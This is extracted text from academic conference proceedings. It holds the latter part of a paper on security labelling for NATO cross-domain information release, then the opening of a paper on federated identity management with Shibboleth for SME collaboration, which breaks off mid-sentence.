Although sharing information may be a main means of NNEC, not all information has to be shared. It<br />
may not be relevant or useful, or it cannot be shared due to limitations other than security. In other<br />
words we must be able to make intelligent decisions on which information is eligible for sharing. For<br />
example one may wish to share a photo but due to bandwidth constraint it is only possible to share it<br />
in a resolution lower than 800x600 pixels. Software may then be used to automatically scale the photo<br />
if it is too large. Another example is to share all recent information objects for which the author is “Jan<br />
de Bruin” because he is one of the planners of an important and complex mission. Many more<br />
examples can be conceived from operational needs, such as: share feeds from sensors from a certain<br />
type like audio only, share images and videos made within a certain range of a GPS location to a<br />
team on a reconnaissance mission or based on keywords selecting which information is sent to such<br />
a mission. Or determine the communication system to use based on an urgency statement in a<br />
document. Depending on the granularity and type of the meta-information the possibilities are virtually<br />
endless.<br />
230
Harm Schotanus et al.<br />
2.3.1 Secure labelled release<br />
Meta-information can also be used to protect, i.e. ensure that information is not shared. For example<br />
do not share objects for which the meta-information says that the creation date is the current month.<br />
Or do not share videos with a resolution higher than 640x480. Or do not share presentation files<br />
which are classified ‘NATO CONFIDENTIAL’ or higher. We address a specific case where criteria that<br />
are suitable for determining the releasability to another domain are carried in meta-information bound<br />
to an information object as secure labelled release.<br />
2.3.2 Dissemination of release information<br />
Somewhere in the middle of duty-to-share and duty-to-protect is the usage to include metainformation<br />
to inform the recipient about any restrictions or responsibilities when processing or resharing<br />
the information. We address this by the moniker disseminating release information.<br />
These developments are not without consequences or certain security challenges. Especially in the<br />
areas of binding meta-information to information and protecting the integrity of (a) this binding, (b) the<br />
information and (c) the meta-information has to be carefully designed. When meta-information is used<br />
in a sharing mechanism and a user on a local workstation can create meta-information, then the<br />
(integrity of the) workstation and its components become critical because an insecure or untrusted<br />
operating system might trick a user into sharing the wrong information. The required level of<br />
assurance depends largely on the level of security that needs to be attained but is also affected by the<br />
specific application of meta-data.<br />
There must also be a fundament to build the meta-information on, such as a system to store and<br />
manage meta-information, retrieve the meta-information given the information itself or vice versa. And<br />
there are many other related challenges in handling data, e.g. how to handle to conflicting sets of<br />
meta-information, how can meta-information be revoked or changed, and so on. These issues need to<br />
be addressed in an information management system 1 .<br />
3. Labelling: An incremental approach<br />
In the previous section we have seen that labelling has manifold purposes. The emphasis has mostly<br />
been on secure labelled release for exchanging information across different security domains. We<br />
propose an incremental approach in which partially related developments are tied together so that<br />
functionality enabled by labelling can be realised step-by-step. This has two main advantages. One, it<br />
will make the development process better organised and hence can be more efficient and costeffective.<br />
Second, users and organisations can benefit from labelling directly because the new<br />
functionality can be used as soon as the step is completed. This is also beneficial for the userexperience.<br />
To achieve this incremental approach, a clear overview is needed of which steps must be taken to<br />
realise each of the intermediate functionality whilst ensuring that the ultimate goal, which is also the<br />
most complex, can still be reached. In this section we propose a plan to achieve the secure labelled<br />
release in a series of smaller, incremental steps that add useful functionality to existing or new<br />
processes. We distinguish four phases:<br />
1. Information lifecycle management<br />
2. Disseminating cross-domain information<br />
3. Integrity protection<br />
4. Secure labelled release.<br />
3.1 Information lifecycle management<br />
In this context, labelling functionality is used to improve information management within a single<br />
information domain. A user may add additional meta-information to an information object, such as the<br />
author, title, publication date, classification – the possibilities are virtually endless. This enables<br />
various management functionality to be used on the document as discussed in Section 2, including<br />
archiving, searching, and deleting information.<br />
1<br />
An information management system comprises more aspects than a content management system that is merely a container<br />
to store and share information within a single domain.<br />
231
Harm Schotanus et al.<br />
The security requirements are minimal, as the binding between the document and the label is weak at<br />
this point. Basically the label only needs to contain a reference to the original document. Within an<br />
information domain, it could be used for enforcing need-to-know separation or communities of<br />
interest. Figure 2 shows an abstraction of the functionality needed for this approach.<br />
Labelling<br />
application<br />
Workstation<br />
Labels and<br />
documents<br />
Information<br />
management<br />
system<br />
Figure 2: Labelling for information lifecycle management purposes<br />
Essentially, the architecture for this set-up contains only two main aspects:<br />
An application that can create labels.<br />
An information management system: an environment or system that can be used to store<br />
information and labels together.<br />
When a user creates information, the labelling application can be used to link several attributes to the<br />
information. The information and the label will both be stored in the information management system<br />
(IMS). The user may disseminate the information either through the IMS or by separate means. The<br />
IMS can in the latter case be used to retrieve the label, when the information is presented.<br />
3.2 Disseminating cross-domain information<br />
We can extend the information lifecycle management functionality so that it is possible to inform a<br />
recipient of information in another information domain about the way the information should be<br />
treated; e.g. under what memorandum of understanding it is exchanged or what classification is<br />
attached to the information. In this case when a user sends the information to a recipient, the label<br />
with the necessary meta-information has to be sent as well. This purpose is mostly intended of<br />
information-sharing across different information domains, where each information domain has the<br />
same or a very similar security policy. The label here has an informative, procedural aim and does not<br />
necessarily form a technical enforcement.<br />
Labelling<br />
application<br />
Workstation<br />
Labels and<br />
documents<br />
Document<br />
Information<br />
management<br />
system<br />
Figure 3: Labelling for disseminating cross-domain information<br />
232<br />
Label<br />
Release<br />
mechanism
Harm Schotanus et al.<br />
In this setup we add a third element, namely the release mechanism. Essentially, the other elements<br />
stay the same. This release mechanism has a two-fold purpose. The first is to verify that a suitable<br />
label accompanies the information and if not, try to retrieve the label from the information<br />
management system. The suitability is established by validating that all the necessary information is<br />
present. The second purpose is the ability to translate an internal label to an external label. For<br />
example certain elements may be removed from the document (such as the name of the author) or<br />
other information may be added (e.g. the date of information exchange), or a different labelling<br />
structure may be used for internal and external purposes 2 .<br />
3.3 Integrity protection<br />
The third step in extending the labelling architecture is to realise integrity protection of information.<br />
Integrity protection refers to the means to establish whether a document is authentic or has been<br />
changed. And as a secondary benefit, it may be established who assessed the authenticity.<br />
The label has to be extended to include a secure binding to link the information and the label together,<br />
in such a way that it can always be detected if an existing label is attached to other (different or<br />
altered) information, or if the label content has been changed. Making a change to an information<br />
object can be detected because that would result in a different object.<br />
For the binding to be secure we need cryptographic support. A method, amongst others, of realising<br />
this is through a PKI. A user has to use a private key to sign the binding in the label, which links the<br />
binding also directly to the user. That is, it can easily be determined who created the label. To validate<br />
the integrity of the document, the public key of the user that created the binding can be used to verify<br />
the binding in the label. In case any changes have been made, the verification will fail.<br />
Certificates<br />
and CRL<br />
Labelling<br />
application<br />
Trusted OS<br />
Workstation<br />
Labels and<br />
documents<br />
PKI<br />
Document<br />
Information<br />
management<br />
system<br />
Label<br />
Release<br />
mechanism<br />
and IEG<br />
Figure 4: Labelling for integrity protection<br />
For a high assurance environment 3 , we also need to ensure that the labelling process works correctly.<br />
In other words we must have a level of assurance that the information the user actually labelled is the<br />
correct information and has not been modified unbeknownst to the user during the process. We<br />
cannot attain that level of assurance on a normal platform (operating system); therefore we need an<br />
operating system or platform that can provide us the needed assurance. This has been named a<br />
trusted operating system. Essentially, each step in the process of labelling must be carried out under<br />
2 Note that the release mechanism does not comprise the entire interconnection here, there may be other elements needed too,<br />
for instance cryptographic units or firewalls to ensure a secure connection.<br />
3 For instance information domains which process highly classified information.<br />
233
Harm Schotanus et al.<br />
conditions that are guaranteed by the operating system, but on the other hand a user must also be<br />
capable of performing his regular tasks on the same platform. We see opportunities to establish this<br />
based on a virtualisation layer on top of a minimal, but trusted core operating system. One virtual<br />
machine will comprise normal functionality and a second will form the labelling application with strict<br />
limitations, this concept is further elaborated upon in (Verkoelen 2010).<br />
An architecture of a workstation that is suitable for creating labels in a trusted manner, is shown in<br />
Figure 5 (Hartog 2010). In essence, this is a virtualisation platform with two virtual machines. One is<br />
used as a workstation with the common applications. The other is used specifically for labelling which<br />
is focussed on binding a label to a given information object in such a way that the process cannot be<br />
disrupted and assurance can be given that only the provided information object is labelled and<br />
nothing else. The information to be labelled has to be exported from the generic to the specific virtual<br />
machine where a label can be created. Then the label can be transferred back to the workstation.<br />
Workstation<br />
Desktop<br />
Labelling<br />
High Assurance<br />
Platform<br />
Hardware<br />
Figure 5: Architecture of a workstation for trusted labelling<br />
The needed level of assurance is created by a high assurance platform. The core component<br />
therefore can be a separation kernel (Rushby 1981)(Information Assurance Directorate 2007), which<br />
is in control of all resources in the system and all communication between the virtual machines. The<br />
virtualisation is layered on top of the HAP. In certain cases with high assurance requirements, specific<br />
hardware requirements may have to be used, but mostly it can be based on generic hardware.<br />
3.4 Secure labelled release<br />
The final objective of this incremental approach is the secure labelled release. The label can then be<br />
used to validate the suitability of exchanging a document across different security domains where the<br />
security policies of the domains may be different. The suitability is determined by different metainformation<br />
stored in a protected label. This could for example refer to the classification of the<br />
information in the document, but may also refer to capabilities of the source of the information<br />
(Smulders 2010),such as the quality of the camera used to take an aerial photograph, or the range of<br />
radar. And of course combinations are also possible. The validation takes place at the border of the<br />
information domain. The label is intended for internal usage, and does not have to be included after<br />
the information has been released. However, it is also a possibility to translate the label to use as in<br />
the case of “Disseminating release information”.<br />
To extend the integrity protection set-up to a full secure labelled release setup we have to add an<br />
extended release mechanism. This extension is twofold. In the first place the release mechanism<br />
must be capable of integrating with the PKI to validate the authenticity of the label and match it<br />
against the document. The release mechanism has to validate the certificate of the user that created<br />
234
Harm Schotanus et al.<br />
the label (by way of for example a CRL) and ascertain the integrity of the document so that it can be<br />
established that the label matches the document and the label is valid.<br />
Labelling<br />
application<br />
Trusted OS<br />
Certificates<br />
and CRL<br />
Workstation<br />
Labels and<br />
documents<br />
PKI<br />
Document<br />
Information<br />
management<br />
system<br />
Label<br />
CRL<br />
Release<br />
mechanism<br />
Trusted OS<br />
Figure 6: Secure labelled release<br />
In the second place, since the release mechanism is now a security device that mediates between<br />
different security domains, it is necessary to raise the assurance of the correct behaviour of this<br />
platform. Therefore it is necessary to introduce a trusted platform for this element as well. In contrast<br />
to what is needed on the workstation, this system is dedicated to a single task and hence, the<br />
operating system only has to ascertain the correct working of that platform and thus this is a different<br />
form of a trusted OS.<br />
To determine whether the document is suitable for release the contents of the label have to be<br />
matched against a policy; each of the criteria in the label may affect the decision of the release<br />
mechanism. A simplified policy could for example be “all documents with a classification of<br />
Unclassified or NATO Restricted may be released”; and “all images with a resolution less than<br />
800×600 may be released”. A real policy may actually be quite complex to establish. Important issues<br />
are establishing the completeness and consistency of the release policy.<br />
3.5 Functional building blocks<br />
This chapter has shown four situations in which meta-information encapsulated in a label added<br />
useful functionality to existing or new processes. For these different applications we have shown the<br />
necessary functional building blocks needed to realise them. This section provides an overview of the<br />
relation between the different applications and functional building blocks and also shows the essential<br />
components within each functional building block.<br />
Figure 7 provides an overview of the relation between the different applications and functional building<br />
blocks. From the left to the right the figure describes an incremental approach to obtain more complex<br />
application functionality with the use of the functional building blocks discussed in Section 3. We<br />
distinguish four basic building blocks:<br />
A labelling mechanism that can be used to construct meta-information.<br />
A release mechanism that controls under which conditions information can be shared with other<br />
domains.<br />
A trusted OS to attain the required level of assurance.<br />
A PKI to ascertain the binding between the label and the information object.<br />
235
Labelling<br />
Label creation<br />
Information lifecycle<br />
Management<br />
Release mechanism<br />
Labelling<br />
Verification<br />
Label translation<br />
Label creation<br />
Disseminate<br />
release information<br />
Harm Schotanus et al.<br />
PKI<br />
Labelling<br />
Trusted OS<br />
CA<br />
Smartcard auth.<br />
Certificate Valid<br />
Secure binding<br />
Label translation<br />
Label creation<br />
…<br />
Secure login<br />
HAP<br />
Integrity<br />
protection<br />
PKI<br />
Release mechanism<br />
Labelling<br />
Trusted OS<br />
CA<br />
Smartcard auth.<br />
Certificate Valid<br />
Certificate valid<br />
Authorisation<br />
Verification<br />
Secure binding<br />
Label translation<br />
Label creation<br />
…<br />
Secure login<br />
HAP<br />
Secure labelled<br />
release<br />
Figure 7: An incremental approach to introduce labelling<br />
Each functional building block can consist of several components which have to be implemented<br />
depending on the functionality we require. When these requirements increase additional functional<br />
building blocks are required and the complexity of the building blocks may increase as more<br />
components are added. As such we have established an incremental approach in which we add<br />
complexity in small steps but in the mean time we create new useful functionality.<br />
The first basic step to use labelling is to implement a system which can create labels and utilise these<br />
labels in an (existing or new) Information Management System to manage information. When all the<br />
processes and procedures are in place and people are used to work with this new form of information<br />
management it can be decided to extend the labelling with more functionality. A next step can be to<br />
implement a release mechanism which can decide to translate internal labels into external labels and<br />
share these labels with other domains. To ensure the integrity of the data-object and metadata-object<br />
PKI and Trusted OS functionality can be added. At the end all four functional building blocks are in<br />
place resulting in a “secure labelled release” application.<br />
Each step goes along with other advantages such as reduced complexity, people have time to<br />
experience and use new functionality, processes and procedures will change incremented and an<br />
better acceptance of the functionality in the organisation.<br />
4. Conclusion<br />
Labelling is an important step to provide the technical means to realise a NEC environment and<br />
implement a duty-to-share mechanism. Not only does it allow the sharing of information, it also<br />
realises a basis so that the information owner can remain in control of which information is shared.<br />
Creation of labels in itself is not a difficult process, nor is the validation of the correctness of such a<br />
label. Most of the means for these are already in place e.g. in the form of PKI. Assurance is a totally<br />
different criterion. To attain the right level it is vital to ascertain that the label is attached correctly to<br />
the right information. Hence it requires many additional controls to achieve that certainty. Crucial in<br />
that aspect is the choice of a platform as this is the basis for assurance.<br />
Implementing labelling for a high security environment is a costly and long-term development. But in<br />
the long run, it can also be a very useful technique to create a solution to exchange information<br />
across different security domains. But on the short term, obtaining results is difficult. However,<br />
encapsulating meta-data in a label can be useful for many other purposes as well. We argued that<br />
236
Harm Schotanus et al.<br />
these aspects can be combined to develop a labelling solution that in the end delivers a cross domain<br />
solution, but in the mean time can be useful for several purposes. We have provided a proposition for<br />
an incremental approach to create a cross domain solution.<br />
By starting with labelling for information management purposes, we can quickly gain results as it can<br />
make accessing the right information easier. This can be extended with limited effort to support a<br />
method to exchange release information with other domains having a similar security policy. This way,<br />
not only have we provided the technical basis for labelling, but also have we prepared the users to<br />
work with labels and appreciate their purpose. The third step in this process can be to implement<br />
integrity protection and this requires an elevation of the assurance of the label creation process. And<br />
finally we reach a true cross domain solution if we elevate the assurance on the validation side as<br />
well. It can be easily spotted nevertheless that careful planning and a solid overview of each individual<br />
step as well as the whole is a necessity to reach the goal. On the other hand, implementing a cross<br />
domain solution in one big step may be just a bridge too far.<br />
5. Future work<br />
The proposed means to realise a cross domain solution can be further extended with other<br />
functionality. These require further research to determine feasibility and technical means to realise<br />
them.<br />
Fine-grained control over information, e.g. labels on individual chapters or paragraphs.<br />
Automatic labelling of information; for instance information from sensors, such as radar or<br />
cameras can be automatically labelled, depending on both the content as well as the capabilities<br />
to generate the information.<br />
Integration of applications and labelling, so that the user can control the process of labelling<br />
(semi-)automatically from the applications.<br />
Life cycle management of information, e.g. use of labels to express changes in the information.<br />
Cross Domain Solutions; it can be a very useful technique to use different labels to exchange<br />
information across different security domains. Based on a domain policy external labels can be<br />
translated into an internal label which is understandable within the domain.<br />
Methodology for policy development. A core concept of an automate release mechanism is<br />
enforcing a policy; creating a usable policy is a complex task, hence a methodology to develop<br />
based on all rules and agreements is needed to ensure the completeness and consistency.<br />
6. References<br />
Buckman, T. (2005) “Nato Network Enabled Capability Feasibility Study – Executive Summary”, [online] version<br />
2.0, NC3A, http://www.dodccrp.org/files/nnec_fs_executive_summary_2.0_nu.pdf<br />
Schotanus, H.A., Boonstra, D. and te Paske, B.J. (2009) “Information Labeling – Cross- Domain Solutions”,<br />
Intercom Vereniging Officieren Verbindingsdienst, 38 th year, No. 2<br />
Martis, E.R., et al. (2006) “Information Assurance : Trendanalysis”, TNO report TNO-D&V 2006 B312<br />
Eggen, A., et al. (2010) “Binding of Metadata to Data Objects – A proposal for a NATO specification”, Norwegian<br />
Defence Research Establishment (FFI) & NC3A<br />
Hartog, T., Degen, A.J.G. and Schotanus, H.A. (2010) “High assurance platform for labelling solutions”, TNO<br />
Information and Communication Technology<br />
Rushby, J. (1981) “Design and Verification of Secure Systems”, ACM Operating Systems Review, Vol. 15, No. 5,<br />
pp 12-21, http://www.csl.sri.com/papers/sosp81/sosp81.pdf<br />
Smulders, A.C.M. (2010) “Rubriceren bottleneck voor informatiedeling”, Intercom Vereniging Officieren<br />
Verbindingsdienst, 39 th year, No. 1, p 33-34<br />
Verkoelen, C.A.A., et al. (2010) “Security shift in future network architectures”, information assurance and cyber<br />
defence; NATO RTO IST 091<br />
Information Assurance Directorate (2007), “U.S. Government Protection Profile for Separation Kernels in<br />
Environments Requiring High Robustness”, version 1.03, http://www.niapccevs.org/pp/pp_skpp_hr_v1.03.pdf<br />
Oudkerk, S., et al. (2010) “A Proposal for an XML Confidentiality Label Syntax and Binding of Metadata to Data<br />
Objects”, information assurance and cyber defence, NATO RTO IST 091<br />
W3C, POWDER: Protocol for Web Description Resources, 1 september 2009, http://www.w3.org/2007/powder/<br />
237
Information Management Security for Inter-Organisational<br />
Business Processes, Services and Collaboration<br />
Maria Semmelrock-Picej 1 , Alfred Possegger 2 and Andreas Stopper 2<br />
1<br />
eBusiness Institute, Klagenfurt University, Austria<br />
2<br />
Infineon IT-Services GmbH Austria, Austria<br />
Maria.Semmelrock-Picej@aau.at<br />
Alfred.Possegger@infineon.com<br />
Andreas.Stopper@infineon.com<br />
Abstract: Web-based collaborations and cross-organizational processes typically require dynamic and contextbased<br />
interactions between involved parties and services. Due to temporary nature of collaboration and an<br />
evolving of competencies of involved companies over time security issues like trust, privacy and identity<br />
management are of a high interest for a long lasting success of virtual collaborations This paper adresses this<br />
issue by presenting some results of an international research project. The vision of this project is to implement a<br />
virtual cooperation system for SMEs to be used for realizing competitive advantages through virtual cooperations.<br />
The paper describes some results of this system. Especially we will discuss issues concerned with identity<br />
management. Identity Federation is one of the key concepts of SPIKE to support “virtual organizations”, their fast<br />
setup, comfortable maintenance and orderly closing. This paper describes the mechanisms from which<br />
collaboration partners, registered at the SPIKE platform, will be authenticated by using a standardized identity<br />
federation protocol – Shibboleth. It is shown how the identity data of a company, using its own IDMS, can be<br />
integrated into the SPIKE platform and what a company has to setup from a technical point of view so that its<br />
employees can be authenticated via Shibboleth. Further an approach is presented suitable for mostly SMEs<br />
which do not have an own IDMS.<br />
Keywords: eCollaboration, security, identity management, phases of cooperation<br />
1. Introduction<br />
Nowadays competition is no longer between single enterprises but among supply chains with numerous<br />
actors. Effective supply chain management has therefore become a potentially valuable way of<br />
securing a competitive advantage and improving organizational performance. Firms are seeking<br />
synergistic combinations of resources and changing their roles and value positions through digital<br />
collaborations (Klein, Rai and Straub 2007). However the understanding of the how and which areas<br />
are most important for the success is still incomplete.<br />
It has been noted in literature that information and communication technologies have a significant<br />
impact on the economic situation and knowledge based activites in peripheral regions. Especially for<br />
SMEs in the cross-border region Carinthia and Slovenia (Ziener 2010) identified a low rate of<br />
internationalization, a small amount of crossborder supply chain networks and activities limited to<br />
regional borders.<br />
ICT support collaboration among people with different competencies and capabilities in virtual<br />
collaborations (Mohrmann et al. 2003), facilitate knowledge access and sharing (Davenport and<br />
Prusak 1998) and enable the codification and dissemination of explicit knowledge (Zack 1999). Virtual<br />
collaboration also increases the knowledge about who knows what, enabling virtual joint work and<br />
supporting easier and fast setup of short-term project based and loosely coupled chains among<br />
participants. In doing so, studies have analyzed that a participation of small and medium sized<br />
enterprises in eCollaboration environments could improve their situation in peripheral regions.<br />
However, despite the general agreement on the positive impacts of virtual collaborations, detailed<br />
micro level evidence on the preconditions and success is limited. Yet it has been analysed, that the<br />
way SMEs interact in collaborative environments depends to a big extent on the security<br />
functionalities and management which impact on almost all knowledge-related activities as a basic<br />
precondition. In other words, existing work typically narrows to very specific processes or activities.<br />
This contribution emphasizes the potential capability of ICTs and their fundamental role to create a<br />
virtual dimension through which companies can share and create new knowledge at both tacit and<br />
explicit level.<br />
Companies have a serious privacy concern about how their information is used, disclosed and<br />
protected and the degree of control they have over the dissemination of the information. Especially<br />
238
Maria Semmelrock-Picej et al.<br />
they are concerned about possible undesirable economic consequences resulting from a misuse of<br />
such information. Indeed, many companies express concern about the privacy and identity<br />
management and research suggests that identity management is of focal concern to companies.<br />
Identity Management is a hot area, experiencing considerable growth and gets more and more one of<br />
the challenging key disciplines an IT department of a midsize to large enterprise has to ise (Jackson<br />
2010). It is not surprising because organizations, supply chains and customers have been tightly<br />
connected together in digital networked economy. Another important aspect is that of identity theft<br />
and misuse, leading to serious damages within enterprises and also in the Internet development.<br />
The major contribution of this paper is in revealing and discussing the identitiy federation approach<br />
that impact trust in collaborative environments. In doing so, this paper shows, based on the<br />
standardized Shibboleth protocol, how the identity data of a company can be integrated, when taking<br />
part in collaborations. The second contribution of this paper is in identifying the requirements of<br />
smallest companies in this field. When talking about these issues in an enterprise context mostly midsize<br />
to large enterprises are in the focus of consideration. This paper presents solutions which bridge<br />
this gap by offering the necessary functionality also to smallest companies. These findings should<br />
enhance very small companies to also start collaborating virtually.<br />
2. The SPIKE project<br />
2.1 Introduction<br />
SPIKE as a virtual infrastructure aims at researching and implementing a virtual collaboration<br />
platform. In order to reach these goals SPIKE’s security infrastructure is highly reliable and adaptive<br />
and consists of the following layers (see next figure), (Semmelrock-Picej and Possegger 2010):<br />
A: Network Enterprise Layer – at level A different companies offer their particular tacit and explicit<br />
knowledge, expertise, resources and skills. All involved companies are characterized by a number<br />
of criteria like strategic position, size of company, market, location, and so on.<br />
B: Conceptual SPIKE Layer: The Service Mediatior of this layer combines all provided tangible<br />
and intangible resources and coordinats them accordingly to the requirements of the market<br />
which than form a new product (see figure 1 B).<br />
Level B also consists of mapping instruments to assign involved companies and their services and<br />
capabilities to the tasks of the business process. This layer particularly supports the selection,<br />
orchestration, management and execution several kinds of services in a controlled way.<br />
2.2 Security functions in SPIKE<br />
In participating the SPIKE platform companies/users first name their identity. The system validates the<br />
user’s claimed identity (authentication). Both steps precede access control which aims at preventing<br />
unauthorized use of a resource as well as use of resources in an unauthorized way.<br />
As identities in virtual cooperations are not anonymous trust and reputation mechanisms are the key<br />
to success of open, dynamic and service oriented virtual collaborations as they lead to social trust of<br />
involved persons in virtual cooperations and are therefore the best strategy to ensure virtual<br />
cooperation. However, this trust is based on repeated interactions wich can be successful or fail.<br />
Therefore a key aspect of our approach is the permanent process of the analysis and evaluation of<br />
interactions which automatically determine trust.<br />
In the last years trust has mostly been connected and analysed in combination with technical security<br />
issues. Based on this several definitions has been developed (Josang, Ismail and Boyd 2007; Artz<br />
and Gil 2007). For our discussion we understand trust more human centric which relies on previous<br />
interactions and improves human collaboration supported with technical systems in a virtual environment.<br />
For this communication is the basis for directly influencing trust between individuals in business<br />
collaborations (Economist 2008) and relies on the experiences of previous interactions (Billhardt,<br />
Hermoso, Ossowski and Centeno 2007; Mui, Mohtashemi and Helberstadt 2002) and the similarity of<br />
interests and skills (Matsuo and Yamamoto 2009). In addition especially in social networks and<br />
collaborations trust is strongly related to information disclosure, identity management and privacy and<br />
can also be used as a basic model to improve document recommendations to better match interests<br />
of users.<br />
239
Maria Semmelrock-Picej et al.<br />
Figure 1: Creation of dynamic value chains for eCollaboration<br />
This paper emphasizes on Federated Identity Management which is based on trust. (Fuchs and<br />
Pernul 2007) define the environment of an Identity Management system as an integrated,<br />
comprehensive framework which is based on three pillars: policies, processes and used technologies.<br />
Identity Management processes deal with user management, organisational as well as technical<br />
approval workflows, and escalation procedures. They form the main administrative workload as they<br />
comprehend the management of the whole user lifecycle. In order to regulate identity related<br />
information flows and processes, policies have to be defined. For example, policies express<br />
regulations for user management processes, delegation issues or general security requirements. The<br />
third pillar technologies can be subdivided in the following three main components:<br />
Directory services provide synchronised information about users and resources forming the<br />
foundation of a comprehensive identity management infrastructure.<br />
240
Maria Semmelrock-Picej et al.<br />
User management deals with the process of managing digital identities throughout their lifecycle,<br />
starting with the creation of accounts, maintenance, i.e. by processing change requests, up to the<br />
deactivation or termination.<br />
Access management deals with the authentication and authorisation of users, controlling access<br />
to connected resources.<br />
2.3 Identity management architecture<br />
First of all, the term Identity Management needs to be discussed in detail. Within the SPIKE project<br />
we have to distinguish when thinking of Identity Management. Companies manage the digital<br />
identities of their users in their IDM systems what is called in-house IDM. When those identities are<br />
used in an inter-organisational manner, we speak about federated IDM. The federated IDM system of<br />
SPIKE is based on Shibboleth. Shibboleth is needed to make use of the digital identities in an interorganisational<br />
context, i.e. the identity information of User A from Company A is used to access<br />
Resource X managed by Company Y. Shibboleth mainly consists of three components: the Where<br />
Are You From Service (WAYF), the Shibboleth Service Provider (Shib SP) and the Shibboleth Identity<br />
Provider (Shib IdP).<br />
SPIKE requires connecting to an existing IDM system of the collaborating companies. Thereby the<br />
already existing digital identities can be used in an interorganisational manner. However, the SPIKE<br />
project targets on organisations of all sizes, from small- and medium-sized enterprises to large<br />
organisations. Large organisations and many medium-sized companies usually run their own IDM<br />
systems, but small and sometimes medium companies as well do not operate an IDM system.<br />
Therefore, SPIKE must distinguish between those two cases (Companies without an IDMS and<br />
companies with IDMS).<br />
Figure 2 shows the generic Identity Management architecture of SPIKE. The figure is reduced to IDMrelevant<br />
components to describe the basic idea of SPIKE’s IDM. SPIKE considers both – companies<br />
running their own IDM solutions as well as enterprises without an IDM system.<br />
Figure 2: SPIKE IDM architecture<br />
In Figure 2, Company A for instance represents a small enterprise employing only a handful of<br />
persons. Therefore they might not have a comprehensive IDM system which is required to participate<br />
in virtual alliances operated by SPIKE. To enable such companies being part of an online<br />
collaboration, SPIKE runs its own IDM solution and thereby covers this existing lack. Therefore, the<br />
SPIKE platform has its own Shibboleth IdP installed which is connected with SPIKE’s IDM solution.<br />
The SPIKE Shibboleth IdP is registered on the SPIKE WAYF service. The IDMS of SPIKE can be<br />
accessed via the SPIKE portal.<br />
241
Maria Semmelrock-Picej et al.<br />
Company B, on the other hand, represents all enterprises running their own IDM systems. Those<br />
companies have to install and configure the Shibboleth IdP software on the IT systems within their<br />
company and connect their IDM solution appropriately. Furthermore the Shib IdPs have to be<br />
registered and connected with the SPIKE WAYF service. Such companies do not need SPIKE’s<br />
IDMS.<br />
In the following, two sequence diagrams show the general procedure for connecting an external IDMS<br />
to SPIKE as well as making use of SPIKE’s integrated IDM solution on a high level basis. The shown<br />
diagrams are reduced to IDM-related steps.<br />
Figure 3 represents the high-level procedure for connecting an external IDMS with the SPIKE<br />
platform. Firstly an administrator of the collaborating company has to install and configure the<br />
Shibboleth IdP software (1). After that a connection between the companies’ IDMS and the Shibboleth<br />
IdP needs to be set up by registering the IDMS (2). According to the required attributes of SPIKE and<br />
the respective resources provided by the alliance partners the administrator of the company can<br />
assign attributes to the involved digital identities (3). The attributes required to access a resource<br />
provided by a service provider are defined during the configuration phase of the SP [D7.2b]. After the<br />
project has finished all connections are disabled and Shibboleth IdP will be uninstalled (4).<br />
Figure 3: Connecting external IDMS with SPIKE<br />
Figure 4 shows a high-level procedure for using SPIKE’s IDMS.<br />
Figure 4: Using SPIKE IDM system<br />
In order to make use of SPIKE’s IDMS, firstly the SPIKE administrator has to create a respective user<br />
account equipped with sufficient access rights and attributes for the responsible user of the particular<br />
company (1). The administrator of company N establishes the needed digital identities in the IDMS of<br />
242
Maria Semmelrock-Picej et al.<br />
SPIKE. Attributes will be assigned respectively, according to the required attributes of SPIKE and the<br />
resources provided by the partners. When an employee leaves the project or the company or the<br />
project ends, the company’s admin destroys those digital identities (2). Within the third step the<br />
SPIKE administrator will delete the admin account of the respective company after finishing the<br />
collaboration project (3).<br />
By means of the IDM solutions – either the companies’ own IDM or SPIKE’s IDM – the collaboration<br />
partners can manage their users and respective attributes by themselves and thereby allow for the<br />
paradigm of federated identity management..<br />
2.4 Evaluation of the applicability of potential solutions for identity management<br />
architecture<br />
In this section a brief introduction on the topic of the applicbility of potential solutions is given whereas<br />
two potential solutions, Apache DS and OpenLDAP, are compared and evaluated against the<br />
requirements defined in section 2.2.:<br />
Table 1 shows a comparison between Apache DS and OpenLDAP based on the requirements for<br />
SPIKE’s integrated IDMS defined in section 2. Both solutions fulfill the defined requirements if<br />
respective admin-GUIs are used in addition. However, during the test phase we also recognized<br />
some minor differences leading to our decision described in the following.<br />
Table 1: Comparison between Apache Directory Service and Open LDAP<br />
Identity Management processes mainly deal with user management and security policies. Apache<br />
Directory Server in conjunction with its corresponding administration tool Apache Directory Studio<br />
offers the possibility to create, delete, and change user accounts and attributes. Thus, the user can be<br />
administrated via Apache Directory Studio. Apache DS itself does not provide an Admin-GUI by<br />
default. Apache DS also covers the three main components of technologies: directory services, user<br />
management and access management. Furthermore it is possible to monitor and log all carried out<br />
actions in order to comply with any kind of legal obligation or regulation. Apache DS also enables the<br />
definition and application of policies. For instance, policies for the quality of a user password in terms<br />
of the string length, the usage of special signs, etc. can be defined.<br />
Summarizing, Apache DS and OpenLADP fulfill all defined requirements, support auditing<br />
functionality and require a separate tool for administration.<br />
In the following a special application case will be presented and we start with the discussion of the<br />
user requirements.<br />
243
Maria Semmelrock-Picej et al.<br />
3. Application case identity federations<br />
3.1 User requirements<br />
Prior to the introduction of the Identity Management System (IDMS) in 2005, access information on<br />
file shares, computers and accounts was distributed to several systems like Active Directory, SunOne<br />
and other applications. Those systems worked independently and there was no mechanism available<br />
to guarantee consistent data (e.g. departments, cost center, phone numbers and names of persons),<br />
based on the delivery from designated master systems, throughout the different systems deployed in<br />
the company. Thus, helpdesk support was required frequently.<br />
Therefore Infineon introduced the IDMS to have a mechanism at hand to collect data from different<br />
master systems, combining the necessary data to digital identities and distribute and enforce this<br />
identity information consequently throughout different directory services and applications. In order to<br />
improve the IDMS and to save the ROI, an automatic user provisioning system and RBAC has to be<br />
set up in a next step.<br />
The major function of provisioning is once a new identity enters the IDMS from the global HR system,<br />
an automatic workflow is triggered to its manager based on certain attributes (like location and<br />
manager information). The respective manager chooses the respective roles for the new employee<br />
and dependent on the request the necessary access to resources (accounts, groups, group<br />
memberships) is set by the IDMS (mostly no human interaction is necessary anymore). Thus, during<br />
the life cycle of the identity roles are added and removed and once an employee leaves the company<br />
access to his resources will be disabled completely. The last case is also called de-provisioning. A<br />
basic approach for provisioning (without a portal- and workflow solution) was developed and<br />
implemented at Infineon in 2007. The results are shown in (Obiltschnig 2007).<br />
Another issue which cannot be tackled exclusively by a centrally-organized IDMS is the collaboration<br />
with external partners. This topic has been deeply researched for more than two decades. Already<br />
started in the mid of the 1980s, research in this area is still ongoing. Wellknown and representative<br />
